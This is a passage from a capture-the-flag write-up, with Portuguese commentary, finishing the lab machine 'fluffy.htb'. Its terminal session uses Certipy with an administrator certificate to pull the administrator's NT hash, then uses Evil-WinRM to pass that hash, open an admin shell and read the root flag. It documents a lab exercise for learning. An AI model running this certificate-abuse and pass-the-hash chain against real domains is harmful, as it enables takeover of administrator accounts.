[*] Updating user 'ca_svc':
userPrincipalName : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'[0x0539] > obtendo a hash do
administrator e obtendo a flag r00t!
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.129.164.91
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': HASH_NTLM
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# evil-winrm -i 10.129.164.91 -u 'administrator' -H 'hash'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
1337_ROOT_:|
*Evil-WinRM* PS C:\Users\Administrator\Documents> Terminamos mais uma máquina espero que tenha aprendido algo nessa sala, nos vemos nas próximas!